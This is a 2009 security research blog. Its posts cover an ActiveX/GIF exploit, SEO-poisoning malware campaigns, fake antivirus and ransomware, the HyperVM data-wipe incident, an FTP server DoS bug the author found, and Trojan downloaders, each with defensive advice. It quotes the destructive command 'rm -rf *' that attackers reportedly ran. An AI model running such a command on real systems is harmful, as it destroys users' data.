Anyways, the vulnerability is pretty interesting in itself. I mean, its not the standard ActiveX kind of vulnerability where you just overflow some parameters inside a function to pwn the SEH. The exploit requires some kind of a GIF file to successfully execute shellcode. Well, not a GIF file as such, but a specially crafted image file - the extension could be anything. This along with the ActiveX control together causes the overflow and SEH overwrite. In fact, the SEH is overwritten by the contents of the image file.

Currently, there are websites hosting this malicious html page. Innocent users are lurked into browsing these websites by some sort of link sent in a mail or via XSS or by social networking sites. Once the user lands on this malicious website, a downloader is executed on users machine as a part of shellcode within the exploit. This further opens up the machine for a host of different malware infections. The exploit for this has been partially published on the internet. Now, it won't be long before we start seeing another flurry of malware distribution being done using this technique.

So, as we wait for our dear Mr.Gates to release a fix for this, I suggest you keep away from those silly mails that ask you to click on some weird link or links that you receive on social networking sites like Facebook/Orkut/Twitter. Now-a-days these so called social networking sites are gaining so much popularity, that attackers have also started targeting these websites first. Also, as a workaround I would suggest to set the kill bit for this ActiveX control (which is a way of preventing vulnerable ActiveX controls from executing inside the browser). You can find more information on that in the Microsoft knowledge base.

As for the Microsoft advisory (whats the point of having one if there is no solution !) you can read it here.

Be careful and browse safe !

Wednesday, July 1, 2009

Bad news for some.. good for others..

It’s said that bad news travels fast ! And no doubt it does, but generally it’s the bad guys who catch it first. Whether it is Michael Jackson's death or Swine flu pandemic or France Airline crash, malware authors don't spare anything that they can use as bait. Moment such news is out, the bad guys immediately register fake domain names and using SEO (Search Engine Optimization) attacks make sure that their malicious links are out there.

This time it was rumors surrounding MJ's news that apart from DoS'ing out Facebook and Twitter websites, had malware authors going in a frenzy to capitalize on the shear volume of searches. Once such fake site was soon distributing malware called "" to visitors who browsed that site. Others claimed they had some video showing Michael’s last moments in Life and redirected uses to a link that looked like It then used an old trick of prompting users to install a fake codec (malware) in order to view the link.

[ Fig 1 - Fake youtube website showing MJ's last moments ]

It’s a known fact that malware authors have these so called scripts that keep track of websites such as google trends and as soon as they see a surge in hits on a particular topic, they will register a new domain and start distributing malware using SEO. Now that's some clever scripting !

So folks, be careful and extra cautious when you start searching for any latest ground breaking news on the internet. Do not install any kind of executable or ActiveX or flash kind of component for your browser if you are not sure about the source. It’s better to visit some other link than taking the risk of installing anything on your machine. Some tools (obviously free !) that I would like to recommend to you are some browser plug-ins for Mozilla. This is what I use and it really helps sometimes -
  • WOT or Web of Trust Plug-in: This Mozilla plug-in kind of preemptively warns you by displaying a small circle next to the link with various colors for bad or good links on any website.
  • FlagFox: This neat utility plug-in will show a small flag of the country to which the website you are browsing belongs too. So next time you get redirected to a Russian or Korean domain you know what to do :)
Apart from that, sometimes Mozilla or google search itself will show a banner informing that the site has been blocked or not safe for viewing. Now, I am not advocating any of this plug-ins to you and neither will I say that these guarantee 100% protection against malware but hey, something is better than nothing ;) !

So here's wishing you a safe & happy browsing.. :) !

Tuesday, June 23, 2009

A new breed of attacks

In the beginning of 2009, there was a sudden increase in new form of malware being distributed. The bad guys are now getting smarter by the day, giving rise to a new breed of attacks being carried out. All the attacks have one common thing though - they exploit victims paranoia for malware !

Almost every month there is a new variant of these so called security or Antivirus programs. These fake security programs pretend to do a scan of your system and claim that the machine is infected with lot of malware, when the fact is that there is none ! Some of the screens shown are so convincing that any one not having an antivirus will easily fall for it.

[ Fig 1 - Fake Antivirus Programs ]

They all boast the WinXP/Vista look and feel. While some of them will trick you into downloading more malware, others will try to scare you into spending $30-80 to buy fake protection. They also supply the Visa, MasterCard and PayPal payment mechanisms that enable consumers to pay.

This takes fake security programs to the next level. Now apart from those irritating screens that show that the machine is infected, the malware locks and prevents other programs from running including Task Manager, Command Prompt or other system and office applications. There are even some variants that encrypt all office files stored on the system. Now the user is forced into paying up for using his own machine :o !

[ Fig 2 - Ransomeware encrypting office files ]

[ Fig 3 - SMS Ransomeware ]

But who said ransomeware was limited to only forcing user to buy fake programs ?! Welcome SMS Ransomeware :) .. While some of this family of malware lock the desktop, others take control of the mouse pointer preventing you from clicking anywhere else (how irritating :/ !) except for a window that requires a code to be entered. The victim is then prompted to send a premium SMS to a specified number to receive the unlock code.

SEO (Search Engine Optimization) Attacks
This attack is carried out by exploiting the way search engines work. The bad guys create different web pages and fill them with words and phrases that are popular search queries, such as "France Airline crash" or "American Idol winner" or "Conficker" for that matter. Next they hack into a popular, legit website using XSS (read Cross Site Scripting) and insert small JavaScript that redirects the browser to their web page. This is added on as many pages of the compromised high-traffic site as they can. This is where the SEO kicks in and starts ranking web pages and prioritizing search results, based on relevance. Now along with the results for popular websites, the bad guys page also turns up. Anyone who clicks on the bad links ends up with Malware !

You might think that all this dirty work might be some script kiddie sitting somewhere in Russia wanting to earn some quick bucks. But that's not all that it is to this story - there a whole bunch of underground syndicates running these operations !! There is an excellent article posted by Byron Acohido on his blog regarding how the bad guys are making profit out of this whole fake programs thing ! Now thats some real scareware ;)

Friday, June 12, 2009

100,000 websites wiped off !

In what appears to be a zero-day exploit on HyperVM virtualization software, the attacker managed to wipe off data of 100,000 websites hosted by company called Vaserv. This software was developed by a company called LxLabs which is based out of Bangalore. HyperVM is a very popular software and used by many companies.

Vaserv suspects that the attacker was able to gain "root" access by exploiting the 0-day vulnerability and then deleted files from the system. On the contrary a anonymous post somewhere suggests it was something else. The post contains all the gory details of how the attackers went about screwing up the systems. I can't believe that there are sadistic people in this world today that enjoy giving commands like "rm -rf *". The extent of the damage is still not completely know and it seems the billing systems were also 0wned ! Apparently, details of the vulnerability were known to LxLabs 2 weeks before this incident took place.

Worst part is that 50% of the customers who were hosted on the compromised ISP didn't have backups (since they had subscribed to un-managed service) so god knows if they will ever get the data back ! A lesson to be learned here for everyone - "If it’s your data, back it up!" Can't rely on others to do it for you. This is like the worst kind of attack that anyone can get and just shows how critical it is to secure the infrastructure especially for big ISP's.

As if this was not enough, the founder of LxLabs committed suicide on the next day of Vaserv reporting this incident. Now people all over seem to be linking these two things together, but I doubt that's the case. Anyways, may his soul rest in peace!


Thursday, June 11, 2009

XM Personal FTP Server vulnerability

Recently I discovered a Denial-of-Service vulnerability in XM Personal FTP Server 5.7. This is a easy to use FTP Server application which can help you create a FTP server really fast without any complex configuration.

This vulnerability was actually discovered in May. Despite of trying multiple times to contact the author of this software, he did not respond to my communication. So eventually I decided to post the details of the vulnerability as well as the PoC on Bugtraq.

The vulnerability exists because the application fails to handle arguments passed to some of the standard FTP commands such as HELP and TYPE. This vulnerability was actually discovered accidentally when I was trying to figure out how to use fuzzing tools ! :) ... The tool used for this was FTP Fuzzer 1.0 from Infigo which a nice tool for fuzzing. This is just a DoS vulnerability and remote code execution is not possible. For some strange reason Security Focus has mentioned that remote code execution is possible, but I don't think so.

Some time I will make an article on Fuzzing. Its pretty interesting concept and in fact I am also writing a protocol fuzzer. Hopefully it should be done soon !

Details of the vulnerability available at -

Friday, June 5, 2009

The long and short of it..

Do you get frustrated sending huge links to people only to find out that they don't work because it got cut due to text wrapping :( ? Well, URL "shortners" are the thing you should be looking for. These websites claim to make the url small so that you can have a customized url and don't have to send the whole long thing to your friends. So, services like "", "" and "" are a lot popular with social networking sites such as twitter where there is a character limit to what you can post. The best part is - its free !

So what's the big deal you may say. The thing is that the way these URL shortening services work is by redirection and this conceals the URL of the actual website you are landing on to. So, someone could send you a link that says "" and actually send you to "". Security is a big concern here and before you know it, you may get redirected to a website that hosts some browser exploit to download malware on your system.

Moreover the reliability is also a issue. For the link to work, now the destination webserver as well as the re-director should be up and running. With these services being given out for free I can imagine the kind of load these servers must be receiving. CEO claims they receive 100 million hits per week** !!! :o

Solution ? - "For every new invention, there is a equal and opposite invention".. welcome "". It will expand and show you every small url that you type in - Smart eh ?! ;) So, next time you receive such shortened links use this website and be sure that you are getting redirected to the correct website.

** Ref:

Tuesday, June 2, 2009

You've g0t Ma1L

Recently I received a funny mail about some missing parcel from "United Parcel Service of America" ! At first, it seem to a very legitimate mail and didn't appear to be a obvious spam email. But unfortunately for the sender of the mail, I knew that I had not ordered any parcel so my hacker senses were soon tingling :) ..

[ Fig 1 - Mail about some parcel not being delivered ]

A closer look at the mail reveals some interesting aspects of the spammer. Firstly there are no obvious spam symptoms and the sender also looks legit. Then the body is also well structured making it look authentic. So, I went ahead (knowing I had a Symantec AV installed & updated) and extracted the contents of the attachment to a folder. To my surprise, it did extract without any warnings.

As a person who eats malware for breakfast and lunch, I have one good habit of un-checking the "Hide extensions for known file Types" option in windows explorer (Tools >> Folder Options >> View) on all systems that I work with. Some how I never understood why this option is there in the first place and that too checked by default for WinXP installations. Anyways, to make matters worse Windows explorer conveniently prevents the full name from showing up (since its a long name) making it look like a nice excell file to open. By now, I am sure any innocent user would have fallen prey to the sender and executed this file.

After selecting the file, the full name shows up - "UPS_DOC_986001.exe". Gotcha ! Now, since when did invoice copies start getting distributed in the form of executables ?! A quick virustotal scan identifies the Trojan as Win32/Bredolab [symantec]. Even as I uploaded the file to virustotal, my symantec AV didn't raise any alarms which is a bit unusual since its the first one to jump on any file I attempt to view. Bredolab is a downloader type of trojan which has been discovered recently. Some of the variants of this type of Postal mails are known to download Fake AV programs and other malicious files.

Such method of distributing malware is not new. Some older versions referring to "Western Union" instead of UPS have been circulating for some time now indicating that this mail could also be from the same malware authors. So, be careful with attachments when you receive mails from unexpected or unknown sources and don't forget to change the windows explorer file extension settings!

Monday, June 1, 2009

Dawn of the Downl0ad3rs

So what are Trojan downloaders ?? To say in short "Malware that is designed to download more malware" (duh !?). Actually, over the years these downloaders have evolved a lot and today they represent a major chunk of the malware family.

So, what is the sole purpose of these so called Trojan downloaders - "To download more nasty stuff on the affected machine" (duh again !?) Yes.. much more than that. They are designed to be lightweight, stealth, evade Intrusion Prevention devices and more over give the attacker full control over what gets downloaded when !!

Typically, as soon as a downloader is executed on a system. It will contact a website (generally hard coded domain names) and wait for the response. But unlike a normal webservers response, what actually comes is a list of URL's to download more bad stuff from -
[ Fig 1 - Typical Trojan downloader webserver response ]

So, now the attacker who owns the server can control what gets downloaded on the affected system. He can change the files or links whenever he wants to. All the downloader has to do is fetch all the files listed in the URL and execute them. But thats not all, how about some obfuscation to trick our good ol' Intrusion Detection/Prevention devices (IDS/IPS) !?

[ Fig 2 - Encoded or obfuscated response ]

In what may seem like bunch of garbage characters, is actually a hex coded or obfuscated data to keep the good guys at bay. The webserver in this case gets even more sophisticated, scripting other activities for the downloader Trojan running on the affected machine!

[ Fig 3 - Using image name for downloading ]

Another trick is to use image names for downloading malware. At first it appears to be a harmless image download, but actually is a executable file ! Wireshark is smart enough to detect that its not a image, but can your IDS/IPS do it ?!

Ultimately a whole bunch of crap - from Worms/Trojans to Fake AV programs to malicious .pdf and .swf files can get downloaded on your system. So, be careful and keep your AV's updated, you never know what a small exe could do to your system !


.. to the Hypersecurity Blog. This blog is about my research in the field of Network and Computer Security. So hop on and I will show you how deep the rabbit hole goes in Alice's computer'land.. :)